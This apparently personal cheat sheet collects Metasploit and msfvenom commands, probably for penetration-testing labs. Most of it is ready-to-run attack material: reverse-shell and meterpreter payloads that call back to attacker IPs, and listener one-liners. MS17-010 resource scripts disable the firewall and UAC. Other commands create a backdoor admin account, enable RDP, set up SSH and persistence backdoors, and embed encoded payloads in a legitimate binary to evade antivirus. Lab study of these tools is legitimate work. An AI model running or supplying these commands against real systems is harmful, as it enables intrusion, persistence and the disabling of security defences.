Metasploit

doc https://pentestwiki.org/msfvenom-payloads-cheat-sheet/ https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom

multi/recon/local_exploit_suggester

List payloads

msfvenom -l payloads --platform windows --arch x64

Reverse listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Oneliner reverse listener

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"

list possible vulnerabilities

multi/recon/local_exploit_suggester

auxiliary/scanner/redis/redis_server

use auxiliary/scanner/mongodb/mongodb_login

Smtp enumeration

auxiliary/scanner/smtp/smtp_enum

Create a backdoor (send a payload every 10 second)

use exploit/windows/local/persistence

Kerberos user enumeration

use auxiliary/gather/kerberos_enumusers

LLMNR

auxiliary/spoof/llmnr/llmnr_response

Setup

start the database service as well as create and initialize the MSF database

sudo msfdb init

# start db
sudo systemctl enable postgresql

Use script

<ruby>

print_status("Backdoor user Settings... for 10.10.10.10")

run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")

print_status("View backdoor user: share_admin")
run_single("set COMMAND 'net user share_admin")
run_single("run")

</ruby>

<ruby>

print_status("Turn Firewall Windows OFF")

run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")
run_single("set SMBPass ")
run_single("set SMBUser ")

print_status("Turn off firewall for all networks")
run_single('set COMMAND "netsh advfirewall set allprofiles state off"')
run_single("run")

print_status("Show current firewall profile")
run_single('set COMMAND "netsh advfirewall show currentprofile"')
run_single("run")

print_status("Disable UAC")
run_single('set COMMAND "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"')
run_single("run")

print_status("Enable Local Account Token")
run_single('set COMMAND "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"')
run_single("run")

</ruby>% 

Use the script

proxychains -q msfconsole -q -x "resource script.rc"

Pivot

https://pentest.blog/explore-hidden-networks-with-double-pivoting/

Adds a route

run autoroute -s 7.7.7.0/24

List all routes

run autoroute -p

Detect ip address

run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24

MsfVenom

https://www.offensive-security.com/metasploit-unleashed/Msfvenom/ https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/

List payloads

msfvenom -l payloads

List the encoders

msfvenom --list encoders

Generate a x64 reverse shell

msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe

# Variation 
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe

# For x32, just remove -a x64

other reverse shell payload generation

msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f msi -o malicious.msi

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai -i 9 LHOST=10.11.21.99 LPORT=4444 -f exe -o  reverse_shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.21.99 LPORT=4444 -f exe > revshell.exe

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai -i 9 LHOST=10.11.21.99 LPORT=4445 -f exe -o revshell.exe

msfvenom -p php/reverse_php LHOST=10.8.28.34 LPORT=1234 -f raw > phpwindowsreverse.php

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.196 LPORT=2222 -f raw > shell.sh

Ping

msfvenom -p windows/exec CMD='cmd.exe /k "ping -n 2 172.16.40.5"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai

Turn off firewall for all networks

msfvenom -p windows/exec CMD='netsh advfirewall set allprofiles state off' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai

Delete user Cory

msfvenom -p windows/exec CMD='cmd.exe /k "net user cory /delete"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai

Delete add Cory as admin

msfvenom -p windows/exec CMD='cmd.exe /k "net user /add cory Wind0wz87!kj && net localgroup administrators cory /add"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai

Enable remote desktop

msfvenom -p windows/exec CMD='cmd.exe /k reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai

Case: limited reverse shell (3 sec ttl) Execute ssh persistence

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; ; set AutoRunScript post/linux/manage/sshkey_persistence; set LHOST 127.0.0.1; set LPORT 6000; run -j; set LPORT 6001; run -j; set LPORT 6002; run -j; set LPORT 6003; run -j; set LPORT 6004; run -j; set LPORT 6005; run -j; set LPORT 6006; run -j; set LPORT 6007; run -j; set LPORT 6008; run -j; set LPORT 6009; run -j; set LPORT 6010; run -j; set SessionCommunicationTimeout 0; set ExitOnSession false; run"

Using setup.rc, a script in which we will set the payload to windows/meterpreter/reverse_https and configure the relevant LHOST and LPORT parameters. We also enable stage encoding using the x86/shikata_ga_nai encoder and configure the post/windows/manage/migrate module to be executed automatically using the AutoRunScript option. This will cause the spawned meterpreter to automatically launch a background notepad.exe process and migrate to it. Finally, the

# ExitOnSession parameter is set to "false" to ensure that the listener keeps accepting new connections and the module is executed with the -j and -z flags to stop us from automatically interacting with the session

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.11.0.4
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate 
set ExitOnSession false
exploit -j -z

Then we can run the script with

sudo msfconsole -r setup.rc

With the listener configured and running, we can, for example, launch an executable containing a meterpreter payload from our Windows VM. We can create this executable with msfvenom:

msfvenom -p windows/meterpreter/reverse_https  LHOST=10.11.0.4 LPORT=443 -f exe -o met.exe

When executed (exploit), our multi/handler accepts the connection and the session was spawned using an encoded second stage payload and successfully migrated automatically into the notepad.exe process.

evade/evasion antivirus (Av)

Inject a payload into an existing PE file,

# Encode and do 9 iterations 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

# Same command through msfconsole
msf6 payload(windows/shell_reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Metasploit [ cheatsheet ]

Metasploit

Setup

Use script

Pivot

MsfVenom

evade/evasion antivirus (Av)

Categories

Recent Write-ups

Recent Posts

Tags